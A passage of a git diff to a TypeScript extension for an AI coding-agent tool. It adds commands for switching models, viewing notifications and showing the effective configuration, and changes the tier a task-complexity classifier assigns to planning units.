(!seedContent) { + ctx.ui.notify(`Yolo seed file is empty: ${resolved}`, "error"); + return true; + } + // Headless path: bootstrap project, dispatch non-interactive discuss, + // then auto-mode starts automatically via checkAutoStartAfterDiscuss + // when the LLM says "Milestone X ready." 
+ const { showHeadlessMilestoneCreation } = await import("../../guided-flow.js"); + await showHeadlessMilestoneCreation(ctx, pi, projectRoot(), seedContent); + } else if (milestoneId) { + // Target a specific milestone — use GSD_MILESTONE_LOCK so state + // derivation only sees this milestone (#2521). + await withMilestoneLock(milestoneId, () => + startAuto(ctx, pi, projectRoot(), verboseMode), + ); + } else { + await startAuto(ctx, pi, projectRoot(), verboseMode); + } return true; } diff --git a/src/resources/extensions/gsd/commands/handlers/core.ts b/src/resources/extensions/gsd/commands/handlers/core.ts index 3028f72c5..ae8da6c60 100644 --- a/src/resources/extensions/gsd/commands/handlers/core.ts +++ b/src/resources/extensions/gsd/commands/handlers/core.ts @@ -1,4 +1,5 @@ -import type { ExtensionCommandContext, ExtensionContext } from "@gsd/pi-coding-agent"; +import type { ExtensionAPI, ExtensionCommandContext, ExtensionContext } from "@gsd/pi-coding-agent"; +import type { Model } from "@gsd/pi-ai"; import type { GSDState } from "../../types.js"; import { computeProgressScore, formatProgressLine } from "../../progress-score.js"; @@ -8,6 +9,7 @@ import { runEnvironmentChecks } from "../../doctor-environment.js"; import { deriveState } from "../../state.js"; import { handleCmux } from "../../commands-cmux.js"; import { projectRoot } from "../context.js"; +import { formatShortcut } from "../../files.js"; export function showHelp(ctx: ExtensionCommandContext): void { const lines = [ @@ -24,11 +26,12 @@ export function showHelp(ctx: ExtensionCommandContext): void { " /gsd new-milestone Create milestone from headless context (used by gsd headless)", "", "VISIBILITY", - " /gsd status Show progress dashboard (Ctrl+Alt+G)", + ` /gsd status Show progress dashboard (${formatShortcut("Ctrl+Alt+G")})`, " /gsd visualize Interactive 10-tab TUI (progress, timeline, deps, metrics, health, agent, changes, knowledge, captures, export)", " /gsd queue Show queued/dispatched units 
and execution order", " /gsd history View execution history [--cost] [--phase] [--model] [N]", " /gsd changelog Show categorized release notes [version]", + ` /gsd notifications View persistent notification history [clear|tail|filter] (${formatShortcut("Ctrl+Alt+N")})`, "", "COURSE CORRECTION", " /gsd steer Apply user override to active work", @@ -36,23 +39,28 @@ export function showHelp(ctx: ExtensionCommandContext): void { " /gsd triage Classify and route pending captures", " /gsd skip Prevent a unit from auto-mode dispatch", " /gsd undo Revert last completed unit [--force]", + " /gsd rethink Conversational project reorganization — reorder, park, discard, add milestones", " /gsd park [id] Park a milestone — skip without deleting [reason]", " /gsd unpark [id] Reactivate a parked milestone", "", "PROJECT KNOWLEDGE", " /gsd knowledge Add rule, pattern, or lesson to KNOWLEDGE.md", + " /gsd codebase [generate|update|stats] Manage the CODEBASE.md cache used in prompt context", "", "SETUP & CONFIGURATION", " /gsd init Project init wizard — detect, configure, bootstrap .gsd/", " /gsd setup Global setup status [llm|search|remote|keys|prefs]", + " /gsd model Switch active session model [provider/model|model-id]", " /gsd mode Set workflow mode (solo/team) [global|project]", " /gsd prefs Manage preferences [global|project|status|wizard|setup|import-claude]", " /gsd cmux Manage cmux integration [status|on|off|notifications|sidebar|splits|browser]", " /gsd config Set API keys for external tools", " /gsd keys API key manager [list|add|remove|test|rotate|doctor]", + " /gsd show-config Show effective configuration (models, routing, toggles)", " /gsd hooks Show post-unit hook configuration", " /gsd extensions Manage extensions [list|enable|disable|info]", " /gsd fast Toggle OpenAI service tier [on|off|flex|status]", + " /gsd mcp MCP server status and connectivity [status|check ]", "", "MAINTENANCE", " /gsd doctor Diagnose and repair .gsd/ state [audit|fix|heal] [scope]", @@ -68,6 
+76,9 @@ export function showHelp(ctx: ExtensionCommandContext): void { export async function handleStatus(ctx: ExtensionCommandContext): Promise { const basePath = projectRoot(); + // Open DB in cold sessions so status uses DB-backed state, not filesystem fallback (#3385) + const { ensureDbOpen } = await import("../../bootstrap/dynamic-tools.js"); + await ensureDbOpen(); const state = await deriveState(basePath); if (state.registry.length === 0) { @@ -76,8 +87,8 @@ export async function handleStatus(ctx: ExtensionCommandContext): Promise } const { GSDDashboardOverlay } = await import("../../dashboard-overlay.js"); - const result = await ctx.ui.custom( - (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done()), + const result = await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done(true)), { overlay: true, overlayOptions: { @@ -105,8 +116,8 @@ export async function handleVisualize(ctx: ExtensionCommandContext): Promise( - (tui, theme, _kb, done) => new GSDVisualizerOverlay(tui, theme, () => done()), + const result = await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDVisualizerOverlay(tui, theme, () => done(true)), { overlay: true, overlayOptions: { @@ -171,7 +182,106 @@ export async function handleSetup(args: string, ctx: ExtensionCommandContext): P ); } -export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandContext): Promise { +function sortModelsForSelection(models: Model[], currentModel: Model | undefined): Model[] { + return [...models].sort((a, b) => { + const aCurrent = currentModel && a.provider === currentModel.provider && a.id === currentModel.id; + const bCurrent = currentModel && b.provider === currentModel.provider && b.id === currentModel.id; + if (aCurrent && !bCurrent) return -1; + if (!aCurrent && bCurrent) return 1; + const providerCmp = a.provider.localeCompare(b.provider); + if (providerCmp !== 0) return providerCmp; + return a.id.localeCompare(b.id); + 
}); +} + +async function resolveRequestedModel( + query: string, + ctx: ExtensionCommandContext, +): Promise | undefined> { + const { resolveModelId } = await import("../../auto-model-selection.js"); + const models = ctx.modelRegistry.getAvailable(); + const exact = resolveModelId(query, models, ctx.model?.provider); + if (exact) return exact; + + const lowerQuery = query.toLowerCase(); + const partialMatches = models.filter((model) => + model.id.toLowerCase().includes(lowerQuery) + || `${model.provider}/${model.id}`.toLowerCase().includes(lowerQuery), + ); + + if (partialMatches.length === 1) return partialMatches[0]; + if (partialMatches.length === 0 || !ctx.hasUI) return undefined; + + const sorted = sortModelsForSelection(partialMatches, ctx.model); + const optionToModel = new Map>(); + const options = sorted.map((model) => { + const label = `${model.provider}/${model.id}`; + optionToModel.set(label, model); + return label; + }); + options.push("(cancel)"); + + const choice = await ctx.ui.select(`Multiple models match "${query}" — choose one:`, options); + if (!choice || typeof choice !== "string" || choice === "(cancel)") return undefined; + return optionToModel.get(choice); +} + +async function handleModel(trimmedArgs: string, ctx: ExtensionCommandContext, pi: ExtensionAPI | undefined): Promise { + const availableModels = ctx.modelRegistry.getAvailable(); + if (availableModels.length === 0) { + ctx.ui.notify("No available models found. Check provider auth and model discovery.", "warning"); + return; + } + if (!pi) { + ctx.ui.notify("Model switching is unavailable in this context.", "warning"); + return; + } + + const trimmed = trimmedArgs.trim(); + let targetModel: Model | undefined; + + if (!trimmed) { + if (!ctx.hasUI) { + const current = ctx.model ? 
`${ctx.model.provider}/${ctx.model.id}` : "(none)"; + ctx.ui.notify(`Current model: ${current}\nUsage: /gsd model `, "info"); + return; + } + + const optionToModel = new Map>(); + const options = sortModelsForSelection(availableModels, ctx.model).map((model) => { + const isCurrent = ctx.model && model.provider === ctx.model.provider && model.id === ctx.model.id; + const label = `${isCurrent ? "* " : ""}${model.provider}/${model.id}`; + optionToModel.set(label, model); + return label; + }); + options.push("(cancel)"); + + const choice = await ctx.ui.select("Select session model:", options); + if (!choice || typeof choice !== "string" || choice === "(cancel)") return; + targetModel = optionToModel.get(choice); + } else { + targetModel = await resolveRequestedModel(trimmed, ctx); + } + + if (!targetModel) { + ctx.ui.notify(`Model "${trimmed}" not found. Use /gsd model with an exact provider/model or a unique model ID.`, "warning"); + return; + } + + const ok = await pi.setModel(targetModel); + if (!ok) { + ctx.ui.notify(`No API key for ${targetModel.provider}/${targetModel.id}`, "warning"); + return; + } + + ctx.ui.notify(`Model: ${targetModel.provider}/${targetModel.id}`, "info"); +} + +export async function handleCoreCommand( + trimmed: string, + ctx: ExtensionCommandContext, + pi?: ExtensionAPI, +): Promise { if (trimmed === "help" || trimmed === "h" || trimmed === "?") { showHelp(ctx); return true; @@ -195,6 +305,10 @@ export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandCo ctx.ui.notify(`Widget: ${getWidgetMode()}`, "info"); return true; } + if (trimmed === "model" || trimmed.startsWith("model ")) { + await handleModel(trimmed.replace(/^model\s*/, "").trim(), ctx, pi); + return true; + } if (trimmed === "mode" || trimmed.startsWith("mode ")) { const modeArgs = trimmed.replace(/^mode\s*/, "").trim(); const scope = modeArgs === "project" ? 
"project" : "global"; @@ -211,6 +325,25 @@ export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandCo await handleCmux(trimmed.replace(/^cmux\s*/, "").trim(), ctx); return true; } + if (trimmed === "show-config") { + const { GSDConfigOverlay, formatConfigText } = await import("../../config-overlay.js"); + const result = await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDConfigOverlay(tui, theme, () => done(true)), + { + overlay: true, + overlayOptions: { + width: "65%", + minWidth: 55, + maxHeight: "85%", + anchor: "center", + }, + }, + ); + if (result === undefined) { + ctx.ui.notify(formatConfigText(), "info"); + } + return true; + } if (trimmed === "setup" || trimmed.startsWith("setup ")) { await handleSetup(trimmed.replace(/^setup\s*/, "").trim(), ctx); return true; diff --git a/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts b/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts new file mode 100644 index 000000000..16d30d49a --- /dev/null +++ b/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts @@ -0,0 +1,140 @@ +// GSD Extension — /gsd notifications Command Handler +// View, filter, and clear the persistent notification history. 
+ +import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent"; + +import { + readNotifications, + clearNotifications, + getUnreadCount, + suppressPersistence, + unsuppressPersistence, + type NotifySeverity, +} from "../../notification-store.js"; +import { GSDNotificationOverlay } from "../../notification-overlay.js"; + +function severityIcon(severity: NotifySeverity): string { + switch (severity) { + case "error": return "✗"; + case "warning": return "⚠"; + case "success": return "✓"; + case "info": + default: return "●"; + } +} + +function formatTimestamp(ts: string): string { + try { + const d = new Date(ts); + return d.toLocaleString("en-US", { hour12: false, month: "short", day: "numeric", hour: "2-digit", minute: "2-digit" }); + } catch { + return ts.slice(0, 19); + } +} + +export async function handleNotificationsCommand( + args: string, + ctx: ExtensionCommandContext, + pi: ExtensionAPI, +): Promise { + // /gsd notifications clear + if (args === "clear") { + clearNotifications(); + // Suppress persistence so the confirmation toast doesn't re-populate the store + suppressPersistence(); + try { + ctx.ui.notify("All notifications cleared.", "success"); + } finally { + unsuppressPersistence(); + } + return true; + } + + // /gsd notifications tail [N] + if (args === "tail" || args.startsWith("tail ")) { + const countStr = args.replace(/^tail\s*/, "").trim(); + const count = countStr ? parseInt(countStr, 10) : 20; + const n = isNaN(count) || count < 1 ? 
20 : Math.min(count, 100); + const entries = readNotifications().slice(0, n); + + if (entries.length === 0) { + ctx.ui.notify("No notifications.", "info"); + return true; + } + + const lines = entries.map((e) => + `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`, + ); + ctx.ui.notify(`Last ${entries.length} notification(s):\n${lines.join("\n")}`, "info"); + return true; + } + + // /gsd notifications filter + if (args.startsWith("filter ")) { + const severity = args.replace(/^filter\s+/, "").trim().toLowerCase(); + if (!["error", "warning", "info", "success"].includes(severity)) { + ctx.ui.notify("Usage: /gsd notifications filter ", "warning"); + return true; + } + const entries = readNotifications().filter((e) => e.severity === severity); + + if (entries.length === 0) { + ctx.ui.notify(`No ${severity} notifications.`, "info"); + return true; + } + + const lines = entries.slice(0, 20).map((e) => + `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`, + ); + const suffix = entries.length > 20 ? `\n... 
and ${entries.length - 20} more` : ""; + ctx.ui.notify(`${severity} notifications (${entries.length}):\n${lines.join("\n")}${suffix}`, "info"); + return true; + } + + // /gsd notifications (no args) — open overlay in TUI, or print summary + if (args === "" || args === "status") { + // Try overlay first (TUI mode) + if (ctx.hasUI) { + try { + await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDNotificationOverlay(tui, theme, () => done()), + { + overlay: true, + overlayOptions: { + width: "80%", + minWidth: 60, + maxHeight: "88%", + anchor: "center", + backdrop: true, + }, + }, + ); + return true; + } catch { + // Fall through to text output if overlay fails + } + } + + // Text fallback (RPC/headless mode) + const unread = getUnreadCount(); + const entries = readNotifications().slice(0, 10); + if (entries.length === 0) { + ctx.ui.notify("No notifications.", "info"); + return true; + } + + const lines = entries.map((e) => + `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`, + ); + const header = unread > 0 ? 
`${unread} unread — ` : ""; + ctx.ui.notify(`${header}Recent notifications:\n${lines.join("\n")}`, "info"); + return true; + } + + // Unknown subcommand + ctx.ui.notify( + "Usage: /gsd notifications [clear|tail [N]|filter ]", + "warning", + ); + return true; +} diff --git a/src/resources/extensions/gsd/commands/handlers/ops.ts b/src/resources/extensions/gsd/commands/handlers/ops.ts index 763c434f3..532a4b4ec 100644 --- a/src/resources/extensions/gsd/commands/handlers/ops.ts +++ b/src/resources/extensions/gsd/commands/handlers/ops.ts @@ -6,7 +6,7 @@ import { handleConfig } from "../../commands-config.js"; import { handleDoctor, handleCapture, handleKnowledge, handleRunHook, handleSkillHealth, handleSteer, handleTriage, handleUpdate } from "../../commands-handlers.js"; import { handleInspect } from "../../commands-inspect.js"; import { handleLogs } from "../../commands-logs.js"; -import { handleCleanupBranches, handleCleanupSnapshots, handleSkip, handleCleanupProjects, handleCleanupWorktrees } from "../../commands-maintenance.js"; +import { handleCleanupBranches, handleCleanupSnapshots, handleSkip, handleCleanupProjects, handleCleanupWorktrees, handleRecover } from "../../commands-maintenance.js"; import { handleExport } from "../../export.js"; import { handleHistory } from "../../history.js"; import { handleUndo } from "../../undo.js"; @@ -53,6 +53,16 @@ export async function handleOpsCommand(trimmed: string, ctx: ExtensionCommandCon await handleHistory(trimmed.replace(/^history\s*/, "").trim(), ctx, projectRoot()); return true; } + if (trimmed === "undo-task" || trimmed.startsWith("undo-task ")) { + const { handleUndoTask } = await import("../../undo.js"); + await handleUndoTask(trimmed.replace(/^undo-task\s*/, "").trim(), ctx, pi, projectRoot()); + return true; + } + if (trimmed === "reset-slice" || trimmed.startsWith("reset-slice ")) { + const { handleResetSlice } = await import("../../undo.js"); + await handleResetSlice(trimmed.replace(/^reset-slice\s*/, 
"").trim(), ctx, pi, projectRoot()); + return true; + } if (trimmed === "undo" || trimmed.startsWith("undo ")) { await handleUndo(trimmed.replace(/^undo\s*/, "").trim(), ctx, pi, projectRoot()); return true; @@ -65,6 +75,10 @@ export async function handleOpsCommand(trimmed: string, ctx: ExtensionCommandCon await handleSkip(trimmed.replace(/^skip\s*/, "").trim(), ctx, projectRoot()); return true; } + if (trimmed === "recover") { + await handleRecover(ctx, projectRoot()); + return true; + } if (trimmed === "export" || trimmed.startsWith("export ")) { await handleExport(trimmed.replace(/^export\s*/, "").trim(), ctx, projectRoot()); return true; @@ -164,6 +178,11 @@ Examples: await dispatchDirectPhase(ctx, pi, phase, projectRoot()); return true; } + if (trimmed === "notifications" || trimmed.startsWith("notifications ")) { + const { handleNotificationsCommand } = await import("./notifications-handler.js"); + await handleNotificationsCommand(trimmed.replace(/^notifications\s*/, "").trim(), ctx, pi); + return true; + } if (trimmed === "inspect") { await handleInspect(ctx); return true; @@ -177,10 +196,25 @@ Examples: await handleFast(trimmed.replace(/^fast\s*/, "").trim(), ctx); return true; } + if (trimmed === "mcp" || trimmed.startsWith("mcp ")) { + const { handleMcpStatus } = await import("../../commands-mcp-status.js"); + await handleMcpStatus(trimmed.replace(/^mcp\s*/, "").trim(), ctx); + return true; + } if (trimmed === "extensions" || trimmed.startsWith("extensions ")) { const { handleExtensions } = await import("../../commands-extensions.js"); await handleExtensions(trimmed.replace(/^extensions\s*/, "").trim(), ctx); return true; } + if (trimmed === "rethink") { + const { handleRethink } = await import("../../rethink.js"); + await handleRethink(trimmed, ctx, pi); + return true; + } + if (trimmed === "codebase" || trimmed.startsWith("codebase ")) { + const { handleCodebase } = await import("../../commands-codebase.js"); + await 
handleCodebase(trimmed.replace(/^codebase\s*/, "").trim(), ctx, pi); + return true; + } return false; } diff --git a/src/resources/extensions/gsd/commands/handlers/parallel.ts b/src/resources/extensions/gsd/commands/handlers/parallel.ts index a2acb5367..bc8eea7da 100644 --- a/src/resources/extensions/gsd/commands/handlers/parallel.ts +++ b/src/resources/extensions/gsd/commands/handlers/parallel.ts @@ -63,7 +63,7 @@ export async function handleParallelCommand(trimmed: string, _ctx: ExtensionComm } const lines = ["# Parallel Workers\n"]; for (const worker of workers) { - lines.push(`- **${worker.milestoneId}** (${worker.title}) — ${worker.state} — ${worker.completedUnits} units — $${worker.cost.toFixed(2)}`); + lines.push(`- **${worker.milestoneId}** (${worker.title}) — ${worker.state} — $${worker.cost.toFixed(2)}`); } const state = getOrchestratorState(); if (state) { @@ -111,7 +111,25 @@ export async function handleParallelCommand(trimmed: string, _ctx: ExtensionComm return true; } - emitParallelMessage(pi, `Unknown parallel subcommand "${subcommand}". Usage: /gsd parallel [start|status|stop|pause|resume|merge]`); + if (subcommand === "watch") { + const root = projectRoot(); + const { ParallelMonitorOverlay } = await import("../../parallel-monitor-overlay.js"); + await _ctx.ui.custom( + (tui, theme, _kb, done) => new ParallelMonitorOverlay(tui, theme, () => done(), root), + { + overlay: true, + overlayOptions: { + width: "90%", + minWidth: 80, + maxHeight: "92%", + anchor: "center", + }, + }, + ); + return true; + } + + emitParallelMessage(pi, `Unknown parallel subcommand "${subcommand}". 
Usage: /gsd parallel [start|status|stop|pause|resume|merge|watch]`); return true; } diff --git a/src/resources/extensions/gsd/commands/handlers/workflow.ts b/src/resources/extensions/gsd/commands/handlers/workflow.ts index 9a0169931..10282fbcc 100644 --- a/src/resources/extensions/gsd/commands/handlers/workflow.ts +++ b/src/resources/extensions/gsd/commands/handlers/workflow.ts @@ -188,6 +188,14 @@ export async function handleWorkflowCommand(trimmed: string, ctx: ExtensionComma return true; } if (trimmed === "quick" || trimmed.startsWith("quick ")) { + if (isAutoActive()) { + ctx.ui.notify( + "/gsd quick cannot run while auto-mode is active.\n" + + "Stop auto-mode first with /gsd stop, then run /gsd quick.", + "error", + ); + return true; + } await handleQuick(trimmed.replace(/^quick\s*/, "").trim(), ctx, pi); return true; } diff --git a/src/resources/extensions/gsd/complexity-classifier.ts b/src/resources/extensions/gsd/complexity-classifier.ts index 6e117cccd..82027227f 100644 --- a/src/resources/extensions/gsd/complexity-classifier.ts +++ b/src/resources/extensions/gsd/complexity-classifier.ts @@ -16,6 +16,7 @@ export interface ClassificationResult { tier: ComplexityTier; reason: string; downgraded: boolean; // true if budget pressure lowered the tier + taskMetadata?: TaskMetadata; } export interface TaskMetadata { @@ -35,14 +36,17 @@ const UNIT_TYPE_TIERS: Record = { "complete-slice": "light", "run-uat": "light", - // Tier 2 — Standard: research, routine planning, discussion + // Tier 2 — Standard: research, routine discussion "discuss-milestone": "standard", + "discuss-slice": "standard", "research-milestone": "standard", "research-slice": "standard", - "plan-milestone": "standard", - "plan-slice": "standard", - // Tier 3 — Heavy: execution, replanning (requires deep reasoning) + // Tier 3 — Heavy: planning, execution, replanning (requires deep reasoning) + // Planning is heavy so it uses the best configured model (e.g. 
Opus) and is + // not downgraded by dynamic routing when a capable model is configured. + "plan-milestone": "heavy", + "plan-slice": "heavy", "execute-task": "standard", // default standard, upgraded by metadata "replan-slice": "heavy", "reassess-roadmap": "heavy", @@ -68,17 +72,20 @@ export function classifyUnitComplexity( ): ClassificationResult { // Hook units default to light if (unitType.startsWith("hook/")) { - const result: ClassificationResult = { tier: "light", reason: "hook unit", downgraded: false }; + const result: ClassificationResult = { tier: "light", reason: "hook unit", downgraded: false, taskMetadata: undefined }; return applyBudgetPressure(result, budgetPct); } // Start with the default tier for this unit type let tier = UNIT_TYPE_TIERS[unitType] ?? "standard"; let reason = `unit type: ${unitType}`; + let taskMeta: TaskMetadata | undefined; // For execute-task, analyze task metadata for complexity signals if (unitType === "execute-task") { - const taskAnalysis = analyzeTaskComplexity(unitId, basePath, metadata); + // Extract metadata once and reuse throughout to avoid double-extraction + taskMeta = metadata ?? extractTaskMetadata(unitId, basePath); + const taskAnalysis = analyzeTaskComplexity(unitId, basePath, taskMeta); tier = taskAnalysis.tier; reason = taskAnalysis.reason; } @@ -93,14 +100,15 @@ export function classifyUnitComplexity( } // Adaptive learning: check if history suggests bumping the tier - const tags = metadata?.tags ?? extractTaskMetadata(unitId, basePath).tags; + // Use already-extracted taskMeta.tags if available to avoid double-extraction + const tags = taskMeta?.tags ?? 
metadata?.tags; const adaptiveAdjustment = getAdaptiveTierAdjustment(unitType, tier, tags); if (adaptiveAdjustment && tierOrdinal(adaptiveAdjustment) > tierOrdinal(tier)) { reason = `${reason} (adaptive: high failure rate at ${tier})`; tier = adaptiveAdjustment; } - const result: ClassificationResult = { tier, reason, downgraded: false }; + const result: ClassificationResult = { tier, reason, downgraded: false, taskMetadata: taskMeta }; return applyBudgetPressure(result, budgetPct); } @@ -184,8 +192,8 @@ function analyzePlanComplexity( // Check if this is a milestone-level plan (more complex) vs single slice const { milestone: mid, slice: sid } = parseUnitId(unitId); if (!sid) { - // Milestone-level planning is always at least standard - return { tier: "standard", reason: "milestone-level planning" }; + // Milestone-level planning is always heavy — requires full context and best model + return { tier: "heavy", reason: "milestone-level planning" }; } // For slice planning, try to read the context/research to gauge complexity @@ -209,7 +217,7 @@ function analyzePlanComplexity( /** * Extract task metadata from the task plan file on disk. */ -function extractTaskMetadata(unitId: string, basePath: string): TaskMetadata { +export function extractTaskMetadata(unitId: string, basePath: string): TaskMetadata { const meta: TaskMetadata = {}; const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId); if (!mid || !sid || !tid) return meta; diff --git a/src/resources/extensions/gsd/config-overlay.ts b/src/resources/extensions/gsd/config-overlay.ts new file mode 100644 index 000000000..1b9cf2852 --- /dev/null +++ b/src/resources/extensions/gsd/config-overlay.ts @@ -0,0 +1,331 @@ +/** + * GSD Configuration Overlay + * + * Read-only TUI overlay showing the effective GSD configuration: + * token profile, model assignments, dynamic routing, git settings, + * budget, workflow toggles, and preference file sources. + * Opened via `/gsd show-config` or `/gsd config`. 
+ */ + +import type { Theme } from "@gsd/pi-coding-agent"; +import { matchesKey, Key, truncateToWidth } from "@gsd/pi-tui"; + +import { + loadEffectiveGSDPreferences, + loadGlobalGSDPreferences, + loadProjectGSDPreferences, + getGlobalGSDPreferencesPath, + getProjectGSDPreferencesPath, + resolveDynamicRoutingConfig, + resolveEffectiveProfile, + resolveModelWithFallbacksForUnit, + resolveAutoSupervisorConfig, +} from "./preferences.js"; + +// ─── Data Collection ────────────────────────────────────────────────────── + +interface ConfigSection { + title: string; + rows: Array<{ label: string; value: string; accent?: boolean }>; +} + +function collectConfigSections(): ConfigSection[] { + const sections: ConfigSection[] = []; + + const globalPrefs = loadGlobalGSDPreferences(); + const projectPrefs = loadProjectGSDPreferences(); + const effective = loadEffectiveGSDPreferences(); + const prefs = effective?.preferences; + + // ─── Sources ───────────────────────────────────────────────────────── + sections.push({ + title: "Sources", + rows: [ + { label: "Global", value: globalPrefs ? globalPrefs.path : `(none) ${getGlobalGSDPreferencesPath()}` }, + { label: "Project", value: projectPrefs ? projectPrefs.path : `(none) ${getProjectGSDPreferencesPath()}` }, + ], + }); + + // ─── Profile ───────────────────────────────────────────────────────── + const profile = resolveEffectiveProfile(); + const profileRows: ConfigSection["rows"] = [ + { label: "Token profile", value: `${profile}${!prefs?.token_profile ? 
" (default)" : ""}`, accent: true }, + ]; + if (prefs?.mode) profileRows.push({ label: "Workflow mode", value: prefs.mode }); + sections.push({ title: "Profile", rows: profileRows }); + + // ─── Models ────────────────────────────────────────────────────────── + const unitTypes: Array<[string, string]> = [ + ["research", "research-milestone"], + ["planning", "plan-milestone"], + ["discuss", "discuss-milestone"], + ["execution", "execute-task"], + ["completion", "complete-slice"], + ["validation", "run-uat"], + ]; + + const modelRows: ConfigSection["rows"] = []; + for (const [label, unitType] of unitTypes) { + const resolved = resolveModelWithFallbacksForUnit(unitType); + if (resolved) { + let val = resolved.primary; + if (resolved.fallbacks.length > 0) { + val += ` \u2192 ${resolved.fallbacks.join(" \u2192 ")}`; + } + modelRows.push({ label, value: val }); + } else { + modelRows.push({ label, value: "(inherit)" }); + } + } + + // subagent is a direct config key + const models = prefs?.models as Record | undefined; + const subVal = models?.subagent; + if (subVal) { + const model = typeof subVal === "string" ? subVal : (subVal as { model?: string })?.model ?? "?"; + modelRows.push({ label: "subagent", value: model }); + } else { + modelRows.push({ label: "subagent", value: "(inherit)" }); + } + + sections.push({ title: "Models", rows: modelRows }); + + // ─── Dynamic Routing ───────────────────────────────────────────────── + const routing = resolveDynamicRoutingConfig(); + const routingRows: ConfigSection["rows"] = [ + { label: "Enabled", value: routing.enabled ? "yes" : "no", accent: routing.enabled }, + ]; + if (routing.enabled) { + routingRows.push({ label: "Escalate on fail", value: routing.escalate_on_failure !== false ? "yes" : "no" }); + routingRows.push({ label: "Budget pressure", value: routing.budget_pressure !== false ? "yes" : "no" }); + routingRows.push({ label: "Cross-provider", value: routing.cross_provider !== false ? 
"yes" : "no" }); + if (routing.tier_models) { + const tm = routing.tier_models; + if (tm.light) routingRows.push({ label: "[L] light", value: tm.light }); + if (tm.standard) routingRows.push({ label: "[S] standard", value: tm.standard }); + if (tm.heavy) routingRows.push({ label: "[H] heavy", value: tm.heavy }); + } + } + sections.push({ title: "Dynamic Routing", rows: routingRows }); + + // ─── Git ───────────────────────────────────────────────────────────── + if (prefs?.git) { + const g = prefs.git; + const gitRows: ConfigSection["rows"] = []; + if (g.isolation !== undefined) gitRows.push({ label: "Isolation", value: String(g.isolation) }); + if (g.auto_push !== undefined) gitRows.push({ label: "Auto push", value: String(g.auto_push) }); + if (g.push_branches !== undefined) gitRows.push({ label: "Push branches", value: String(g.push_branches) }); + if (g.merge_strategy) gitRows.push({ label: "Merge strategy", value: g.merge_strategy }); + if (g.main_branch) gitRows.push({ label: "Main branch", value: g.main_branch }); + if (g.remote) gitRows.push({ label: "Remote", value: g.remote }); + if (gitRows.length > 0) sections.push({ title: "Git", rows: gitRows }); + } + + // ─── Budget ────────────────────────────────────────────────────────── + if (prefs?.budget_ceiling !== undefined || prefs?.budget_enforcement) { + const budgetRows: ConfigSection["rows"] = []; + if (prefs.budget_ceiling !== undefined) budgetRows.push({ label: "Ceiling", value: `$${prefs.budget_ceiling}` }); + if (prefs.budget_enforcement) budgetRows.push({ label: "Enforcement", value: String(prefs.budget_enforcement) }); + sections.push({ title: "Budget", rows: budgetRows }); + } + + // ─── Auto Supervisor ───────────────────────────────────────────────── + if (prefs?.auto_supervisor) { + const sup = resolveAutoSupervisorConfig(); + const supRows: ConfigSection["rows"] = []; + if (sup.model) supRows.push({ label: "Model", value: sup.model }); + supRows.push({ label: "Soft timeout", value: 
`${sup.soft_timeout_minutes}m` }); + supRows.push({ label: "Idle timeout", value: `${sup.idle_timeout_minutes}m` }); + supRows.push({ label: "Hard timeout", value: `${sup.hard_timeout_minutes}m` }); + sections.push({ title: "Auto Supervisor", rows: supRows }); + } + + // ─── Toggles ───────────────────────────────────────────────────────── + const toggleRows: ConfigSection["rows"] = []; + if (prefs?.phases) { + const p = prefs.phases; + if (p.skip_research) toggleRows.push({ label: "skip_research", value: "on" }); + if (p.skip_reassess) toggleRows.push({ label: "skip_reassess", value: "on" }); + if (p.skip_slice_research) toggleRows.push({ label: "skip_slice_research", value: "on" }); + if (p.skip_milestone_validation) toggleRows.push({ label: "skip_milestone_validation", value: "on" }); + if (p.require_slice_discussion) toggleRows.push({ label: "require_slice_discussion", value: "on" }); + } + if (prefs?.uat_dispatch) toggleRows.push({ label: "uat_dispatch", value: "on" }); + if (prefs?.auto_visualize) toggleRows.push({ label: "auto_visualize", value: "on" }); + if (prefs?.auto_report === false) toggleRows.push({ label: "auto_report", value: "off" }); + if (prefs?.show_token_cost) toggleRows.push({ label: "show_token_cost", value: "on" }); + if (prefs?.forensics_dedup) toggleRows.push({ label: "forensics_dedup", value: "on" }); + if (prefs?.unique_milestone_ids) toggleRows.push({ label: "unique_milestone_ids", value: "on" }); + if (prefs?.service_tier) toggleRows.push({ label: "service_tier", value: prefs.service_tier }); + if (prefs?.search_provider && prefs.search_provider !== "auto") toggleRows.push({ label: "search_provider", value: prefs.search_provider }); + if (prefs?.context_selection) toggleRows.push({ label: "context_selection", value: prefs.context_selection }); + if (prefs?.widget_mode && prefs.widget_mode !== "full") toggleRows.push({ label: "widget_mode", value: prefs.widget_mode }); + if (prefs?.experimental?.rtk) toggleRows.push({ label: 
"experimental.rtk", value: "on" }); + if (toggleRows.length > 0) sections.push({ title: "Toggles", rows: toggleRows }); + + // ─── Parallel ──────────────────────────────────────────────────────── + if (prefs?.parallel) { + const pc = prefs.parallel; + const parallelRows: ConfigSection["rows"] = []; + if (pc.max_workers !== undefined) parallelRows.push({ label: "Max workers", value: String(pc.max_workers) }); + if (pc.merge_strategy) parallelRows.push({ label: "Merge strategy", value: pc.merge_strategy }); + if (pc.auto_merge) parallelRows.push({ label: "Auto merge", value: pc.auto_merge }); + if (parallelRows.length > 0) sections.push({ title: "Parallel", rows: parallelRows }); + } + + // ─── Hooks ─────────────────────────────────────────────────────────── + const postHooks = prefs?.post_unit_hooks?.filter(h => h.enabled !== false) ?? []; + const preHooks = prefs?.pre_dispatch_hooks?.filter(h => h.enabled !== false) ?? []; + if (postHooks.length > 0 || preHooks.length > 0) { + const hookRows: ConfigSection["rows"] = []; + if (preHooks.length > 0) hookRows.push({ label: "Pre-dispatch", value: `${preHooks.length} active` }); + if 